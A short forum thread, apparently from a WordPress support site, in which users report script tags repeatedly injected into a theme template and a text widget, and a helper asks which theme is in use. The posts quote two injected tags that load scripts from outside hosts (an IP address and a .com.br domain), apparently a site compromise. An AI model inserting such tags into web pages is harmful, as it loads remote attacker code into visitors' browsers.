HELP! Unwanted javascript code keeps getting inserted into Main Index Template (4 posts)

Unwanted code keeps appearing at the top of the Main Index Template on my theme. It throws the home page all out of whack. When I delete the code and Update, it's back to normal. But it keeps happening by itself. Does anyone know what's going on and how I can stop it from happening? The code is not always the same. Below are 2 recent examples:

    <script type="text/javascript" src="http://187.45.206.10/p/get_applet.php"></script>

    <script type="text/javascript" src="http://lig-limp.com.br/rebots.php"></script>

I'm getting the same thing on a site, in the form of a text widget. I keep deleting it and it keeps appearing back the next day.

    <script type="text/javascript" src="http://187.45.206.10/p/get_applet.php"></script>

    Heya vglazar,

Sounds like some rogue spamminess in your theme.

Which theme are you using? Can you point us to your site address to take a look?

    Cheers! :)
